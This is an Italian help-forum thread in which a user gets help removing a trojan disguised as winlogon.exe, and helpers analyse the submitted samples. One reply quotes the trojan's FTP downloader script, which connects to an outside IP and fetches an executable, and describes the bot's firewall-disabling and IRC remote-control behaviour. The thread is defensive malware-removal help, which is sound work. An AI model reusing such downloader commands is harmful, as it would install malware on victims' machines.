Trojan C:\WINDOWS\system32\i - winlogon.exe

[michela.molinar]

Salve a tutti!!
Premetto che ho installato da pochi giorni Avast l' ho aggiornato. Dopodiche ho iniziato ad avere i problemi seguenti.
Ultimamente il processo logon.exe chiede di accedere a Internet ho fatto tutte le scansioni descritte nella Guida Rimozione Malware. Ho pulito tutto con ATF cleaner. Ma Avast,TrojanRemover,Ewido non rileva nulla di questo winlogon e del trojan che ho trovato solo facendo la scansione on line.

-scansione con Kaspersky on line e mi rileva :
C:\WINDOWS\winlogon.exe Suspicious: Packed.Win32.CryptExe

-Inoltre ci sono a altre cose rilevate sospette dalla scansione on line che se volete la metto.

-E' stato individauto anche questo trojan:
C:\WINDOWS\system32\i Infected: Trojan-Downloader.BAT.Ftp.ab

Io l’ho trovato e inviato a suspected file. Vi è arrivato??
Per eliminarlo come faccio? seguo la Guida alla rimozione di LinkOptimizer / Trojan Agent oppure lo cancello semplicemente? :master:
i sintomi non sono quelli descritti nella Vs. Guida alla Rimozione ma questi:
ora il pc sembra andare. ieri non si aprivano le pagine di Explorer poi si aprivano 2 o 3 processi di winlogon al 30 % o piu.
Ho cercato di disattivarli (TaskManager) ma non mi è stato concesso di terminarli. winlogon ora utilizza solo 354Kb. Ma cos è? e sapete come faccio a eliminarlo?


Grazie per l'attenzione!!

[LUCASS]

Si,il file è arrivato,grazie
Probabilmente, anzi sicuramente è legato all'altro file
C:\WINDOWS\winlogon.exe <-------------
il file inviato da te è uno script per scaricare altri files, probabilmente maligni, via ftp.

open 82.48.39.18 3151
user 1 1
get setup_14886.exe
quit

L'altro file segnato da kaspersky potrebbe essere maligno,te lo segnala per via della compressione,di solito i malware vengono compressi con software "strani" ,CryptExe sta ad indicare un file compresso\criptato,se me lo invii mi fai un grande piacere

Ciao

[michela.molinar]

ora spybot mi ha rilevato winlogon ma non me lo fa eliminare: Processo di sistema critico. Impossibile eliminarlo. L ho messo in una cartella sul desktop ma nn melo fa eliminare.
Servira a qualcosa riavviare in modalita provvisoria..? provo poi ti dico!!
.. stasera faccio 1 altra skansione.
Spero ti sia arrivato winlogon.exe
A stasera. Grazie x l aiuto!!

[LUCASS]

Si il file è arrivato,grazie,da come ho visto è una varianti di sdbot/agabot o simile,disattiva il firewall di xp,disattiva alcuni firewall e antivirus,apporta alcune modifiche al registro per non fare installare service pack e pacht di microsoft,infine si connette a irc e riceve comandi da remoto


Ti consiglio di avviare in modalità provvisoria ed eliminare quel file

Ciao

[michela.molinar]

Grazie mille! Ora ho rifatto la scansione OnLine ed è tutto a posto.
Mi preoccupa il fatto ke Avast non abbia intravisto alcun problema !!
Questo significa che ogni tanto devo fare scansioni OnLine?

-Comunque cosa significa questa voce, è da fixare? Come faccio a conoscere IP o dominio di questo? E' il mio server per l'accesso a internet?

O17 - HKLM\System\CCS\Services\Tcpip\..\{7966A53D-ECD2-4C8E-9018-B2300D0AAFAF}: NameServer = 85.37.17.47 85.38.28.82
Abbastanza sospetto Se il Dominio non appartiene al vostro provider Internet od alla vostra rete aziendale, questi elementi dovrebbero essere eliminati. Anche gli elementi 'SearchList' dovrebbero essere cancellati (Fix).
Conoscete l'indirizzo IP o il Dominio '85.37.17.47 85.38.28.82'? Se no, eliminate questo oggetto.

-Mi sapete dire di piu' su questa voce cioè io il file 7.tmp lo avevo cancellato e ora perchè rileva che manca?

O23 - Service: LogCrd - Unknown owner - C:\WINDOWS\TEMP\7.tmp (file missing)
Sconosciuto Servizio sconosciuto. (7.tmp)

Molto gentili Grazie!!
Purtroppo non ho altri trojan da mandarti.. alla prox LUCASS!!

[BilloKenobi]

[b]O17 - HKLM\System\CCS\Services\Tcpip\..\{7966A53D-ECD2-4C8E-9018-B2300D0AAFAF}: NameServer = 85.37.17.47 85.38.28.82
Abbastanza sospetto Se il Dominio non appartiene al vostro provider Internet od alla vostra rete aziendale, questi elementi dovrebbero essere eliminati. Anche gli elementi 'SearchList' dovrebbero essere cancellati (Fix).
Conoscete l'indirizzo IP o il Dominio '85.37.17.47 85.38.28.82'? Se no, eliminate questo oggetto.

sono del provider. mi pare alice. tutto ok

[amvinfe]

ecco la descrizione del file che hai inviato a Lucass e quali antivirus riconoscono la minaccia

http://www.suspectfile.com/forum/viewtopic.php?t=177

http://www.suspectfile.com/forum/viewtopic.php?t=179

[michela.molinar]

Grazie mille x le risposte su O17 BilloKenobi.
amvinfe grazie, ho letto i Link in effetti era quello che provocava al mio pc cioè firewall e antivirus disattivati.
Quindi io ora ho winlogon.exe in C:\WINDOWS\system32 qui puo' stare .. e sto tranquilla!

Ora posso chiedervi una cosa riguardo Helpsvc.exe ke ogni tanto prende il via ed arriva nel giro di 10 minuati ad occupare il 100% della CPU rallentando tutto. cosa posso fare?..
So che non è pericoloso e si puo' Disattivare ma il fatto è ke non riesco a disattivarlo con Tsk Manager. Cosa posso fare..?

Grazie salutoni!!

[michela.molinar]

Helpsvc.exe non da piu' problemi .. non so perchè ma non compare.
Grazie alla prox!